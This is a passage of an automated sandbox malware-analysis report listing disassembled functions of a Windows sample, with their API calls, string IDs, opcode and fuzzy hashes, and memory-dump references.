                                                        • Opcode ID: 64bc4e4cc1dd788058ffb300863382c12ef45b6a3cce1e9661653e46b4917774
                                                        • Instruction ID: 1edd61e9c0c78dd44483376c16ba7eab4c0a22ffdebe9030e5b457792bc5fbec
                                                        • Opcode Fuzzy Hash: 64bc4e4cc1dd788058ffb300863382c12ef45b6a3cce1e9661653e46b4917774
                                                        • Instruction Fuzzy Hash: D0116031A9016979D724F765DC8AEFFBA7CFB95B50F40042DB419A20D2DFB01D45C9A0
                                                        Function 001246B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: f735f88c6150889773a1fc1e741defe2624dd2eb50a0e6f7fe272cd822c178a7
                                                        • Instruction ID: 4c911f140fec2dda36656a8cb554a5c0ffd2abf4af812d288e6a8a56608c1cb6
                                                        • Opcode Fuzzy Hash: f735f88c6150889773a1fc1e741defe2624dd2eb50a0e6f7fe272cd822c178a7
                                                        • Instruction Fuzzy Hash: CE110A35504124AFDB14AB70EC4AEEA77BCEF02711F0401BAF555A61A2FF749ED28650
                                                        Function 00124F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00124F7A
                                                          • Part of subcall function 000E049F: timeGetTime.WINMM(?,7694B400,000D0E7B), ref: 000E04A3
                                                        • Sleep.KERNEL32(0000000A), ref: 00124FA6
                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00124FCA
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00124FEC
                                                        • SetActiveWindow.USER32 ref: 0012500B
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00125019
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00125038
                                                        • Sleep.KERNEL32(000000FA), ref: 00125043
                                                        • IsWindow.USER32 ref: 0012504F
                                                        • EndDialog.USER32(00000000), ref: 00125060
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 8d379584adc943e0014d64c39da7c6623b6a9a69d188bf95b5285edfb6ea6888
                                                        • Instruction ID: 20183cd06d0f40dcf96a0fe0ca97bdb814bdba2748b5f1717ac9a275b2bd683c
                                                        • Opcode Fuzzy Hash: 8d379584adc943e0014d64c39da7c6623b6a9a69d188bf95b5285edfb6ea6888
                                                        • Instruction Fuzzy Hash: E121C078200A05EFE7105F60FDC8A263B6BEB4A785F141028F10582AB1DB718EE18B72
                                                        Function 0012D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • CoInitialize.OLE32(00000000), ref: 0012D5EA
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0012D67D
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0012D691
                                                        • CoCreateInstance.OLE32(00152D7C,00000000,00000001,00178C1C,?), ref: 0012D6DD
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0012D74C
                                                        • CoTaskMemFree.OLE32(?,?), ref: 0012D7A4
                                                        • _memset.LIBCMT ref: 0012D7E1
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0012D81D
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0012D840
                                                        • CoTaskMemFree.OLE32(00000000), ref: 0012D847
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0012D87E
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0012D880
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: e7fe5378f33dc91e952d753fe1fe4da56aac3adba5b71421f77719a6960f72a2
                                                        • Instruction ID: 4e13369551d7d7cad005a679622cd720768a5f6e1ef0c459c34a33b634c11800
                                                        • Opcode Fuzzy Hash: e7fe5378f33dc91e952d753fe1fe4da56aac3adba5b71421f77719a6960f72a2
                                                        • Instruction Fuzzy Hash: E6B1DD75A00119AFDB04DFA4D888EAEBBB9FF49314F148469F909EB261DB30ED45CB50
                                                        Function 0011C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 0011C283
                                                        • GetWindowRect.USER32(00000000,?), ref: 0011C295
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0011C2F3
                                                        • GetDlgItem.USER32(?,00000002), ref: 0011C2FE
                                                        • GetWindowRect.USER32(00000000,?), ref: 0011C310
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0011C364
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0011C372
                                                        • GetWindowRect.USER32(00000000,?), ref: 0011C383
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0011C3C6
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0011C3D4
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0011C3F1
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0011C3FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 0cc84aa2a41768ac815d9c2d286a951a8d0d79b5cb1ece42b5dc4bb947f98edb
                                                        • Instruction ID: c5b09233fe2015785c29ba40cf3940c38633980ee975c4e63915951120e5d9e4
                                                        • Opcode Fuzzy Hash: 0cc84aa2a41768ac815d9c2d286a951a8d0d79b5cb1ece42b5dc4bb947f98edb
                                                        • Instruction Fuzzy Hash: 21516E75B00205AFDB18CFA9DD89AAEBBBAFB88311F14813DF515D72A0D7709D418B50
                                                        Function 000C201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000C2036,?,00000000,?,?,?,?,000C16CB,00000000,?), ref: 000C1B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000C20D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,000C16CB,00000000,?,?,000C1AE2,?,?), ref: 000C216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 000FBCA6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000C16CB,00000000,?,?,000C1AE2,?,?), ref: 000FBCD7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000C16CB,00000000,?,?,000C1AE2,?,?), ref: 000FBCEE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000C16CB,00000000,?,?,000C1AE2,?,?), ref: 000FBD0A
                                                        • DeleteObject.GDI32(00000000), ref: 000FBD1C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: b22507ff6b5d9efaff32ae1426fc706d0a890ed6ddc7ae1f85e9c20da6565fc9
                                                        • Instruction ID: c4e160584fc5e7be706805dc6cf6688d0c3d835a1f56e69098ca27d7c7facdb3
                                                        • Opcode Fuzzy Hash: b22507ff6b5d9efaff32ae1426fc706d0a890ed6ddc7ae1f85e9c20da6565fc9
                                                        • Instruction Fuzzy Hash: 35618935100A04DFCB359F15C948B2EBBF2FB51312F64852EE6429AE72C770A991EF91
                                                        Function 000C21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C25DB: GetWindowLongW.USER32(?,000000EB), ref: 000C25EC
                                                        • GetSysColor.USER32(0000000F), ref: 000C21D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: 7989977fa16ae98aa68a639e8cc22ea5d8247eb9cc274d729da40ecfbdee44f6
                                                        • Instruction ID: e1987c4f2337e0439fcd7ab7b45093a9f8449fa8c4842edff1a36775c43bb7ea
                                                        • Opcode Fuzzy Hash: 7989977fa16ae98aa68a639e8cc22ea5d8247eb9cc274d729da40ecfbdee44f6
                                                        • Instruction Fuzzy Hash: 47419335100544EEDB219F28DC48FBD3BA5EB06731F154269FE658AAF1C7318C82EB11
                                                        Function 0012A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,0014F910), ref: 0012A90B
                                                        • GetDriveTypeW.KERNEL32(00000061,001789A0,00000061), ref: 0012A9D5
                                                        • _wcscpy.LIBCMT ref: 0012A9FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 401c85cb531a191135e5885cd3e49c9590346c370bf6bd50659e15be9a005716
                                                        • Instruction ID: a5ea1c09d0b141bf5d9c8842a99c25634a5519ccf82bf525de1bc83bf8651a0d
                                                        • Opcode Fuzzy Hash: 401c85cb531a191135e5885cd3e49c9590346c370bf6bd50659e15be9a005716
                                                        • Instruction Fuzzy Hash: 5051EC31108311AFC704EF15D992EAFB7A5EF84308F95482DF58A672A2DB30D999CB53
                                                        Function 000C9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __i64tow__itow__swprintf
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 421087845-2263619337
                                                        • Opcode ID: d46658cf8e1356442f24d748d975bc0f9ccb1e16b3150fa50d810575ddd565a6
                                                        • Instruction ID: b2fe8c212faa5564b945126b68cea6bb9b34415d0824b9f110c9e02b5421b44b
                                                        • Opcode Fuzzy Hash: d46658cf8e1356442f24d748d975bc0f9ccb1e16b3150fa50d810575ddd565a6
                                                        • Instruction Fuzzy Hash: 2841F37150460AAEEB24DF34DC46FBE77E8EF45700F2044AEE649DB282EE71A9459B10
                                                        Function 00147152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0014716A
                                                        • CreateMenu.USER32 ref: 00147185
                                                        • SetMenu.USER32(?,00000000), ref: 00147194
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00147221
                                                        • IsMenu.USER32(?), ref: 00147237
                                                        • CreatePopupMenu.USER32 ref: 00147241
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0014726E
                                                        • DrawMenuBar.USER32 ref: 00147276
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$F
                                                        • API String ID: 176399719-3044882817
                                                        • Opcode ID: 34e5b997595032a9f46ceccc13f7307cf8e24effeba9c425977f9575448e5e1e
                                                        • Instruction ID: 9ad1d31697684892cf5c5ea510c8041580fd4999b3d01068a125a972c633bd78
                                                        • Opcode Fuzzy Hash: 34e5b997595032a9f46ceccc13f7307cf8e24effeba9c425977f9575448e5e1e
                                                        • Instruction Fuzzy Hash: 18418878A01209EFDB20DFA4D984E9ABBF5FF09350F154529F905AB3A1D771AA10CF90
                                                        Function 001474BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0014755E
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00147565
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00147578
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00147580
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0014758B
                                                        • DeleteDC.GDI32(00000000), ref: 00147594
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0014759E
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 001475B2
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 001475BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: ba6f0e9bb037c04b3b2770ac6adc2ce442f48eb691e6176cbbab195c376edca3
                                                        • Instruction ID: 6b8b33984fd3aa9c29a738872758dd02ca867b3ad6fb7d115399e8776c91c7ce
                                                        • Opcode Fuzzy Hash: ba6f0e9bb037c04b3b2770ac6adc2ce442f48eb691e6176cbbab195c376edca3
                                                        • Instruction Fuzzy Hash: 71316C76105214BFDF119F64DC48FEA3B69EF0A761F110228FA159A1F0C731D852DBA4
                                                        Function 000E6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 000E6E3E
                                                          • Part of subcall function 000E8B28: __getptd_noexit.LIBCMT ref: 000E8B28
                                                        • __gmtime64_s.LIBCMT ref: 000E6ED7
                                                        • __gmtime64_s.LIBCMT ref: 000E6F0D
                                                        • __gmtime64_s.LIBCMT ref: 000E6F2A
                                                        • __allrem.LIBCMT ref: 000E6F80
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E6F9C
                                                        • __allrem.LIBCMT ref: 000E6FB3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E6FD1
                                                        • __allrem.LIBCMT ref: 000E6FE8
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E7006
                                                        • __invoke_watson.LIBCMT ref: 000E7077
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction ID: 6429b1b5e80f25d07b2cc9613b41e5355beb2c6a9d8053df720ec4ebac59fbed
                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction Fuzzy Hash: A6711772A00756AFD714AE6AEC41BAAB3E8AF14764F148139F514F76C2E771E9008790
                                                        Function 00122527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122542
                                                        • GetMenuItemInfoW.USER32(00185890,000000FF,00000000,00000030), ref: 001225A3
                                                        • SetMenuItemInfoW.USER32(00185890,00000004,00000000,00000030), ref: 001225D9
                                                        • Sleep.KERNEL32(000001F4), ref: 001225EB
                                                        • GetMenuItemCount.USER32(?), ref: 0012262F
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0012264B
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00122675
                                                        • GetMenuItemID.USER32(?,?), ref: 001226BA
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00122700
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00122714
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00122735
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: f19eb273a09a740fc41736f0675fe422f6b6779033a906c7dd20d9618417c67c
                                                        • Instruction ID: d7fd505f7c1490b4454efc92cb411d7a830c31d33374b1498862b12a13ee532a
                                                        • Opcode Fuzzy Hash: f19eb273a09a740fc41736f0675fe422f6b6779033a906c7dd20d9618417c67c
                                                        • Instruction Fuzzy Hash: CD61DF75900269BFDB21CF64EC88EFE7BB9EB02304F544159F841A7260D731AE66CB20
                                                        Function 00146F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00146FA5
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00146FA8
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00146FCC
                                                        • _memset.LIBCMT ref: 00146FDD
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00146FEF
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00147067
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 1770641916d5cb8ad96f1e7bd119bab01d4f924f62a128007ee7f273d1455d0d
                                                        • Instruction ID: ca3abbb9c3048dc1f131ede13877b6772f65f5c3605bcf0c3b63716e13c99825
                                                        • Opcode Fuzzy Hash: 1770641916d5cb8ad96f1e7bd119bab01d4f924f62a128007ee7f273d1455d0d
                                                        • Instruction Fuzzy Hash: 95616C75A00248AFDB11DFA4CC81EEE77F9EF09710F10416AFA14AB2A1D771AE45DB90
                                                        Function 00116B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00116BBF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00116C18
                                                        • VariantInit.OLEAUT32(?), ref: 00116C2A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00116C4A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00116C9D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00116CB1
                                                        • VariantClear.OLEAUT32(?), ref: 00116CC6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00116CD3
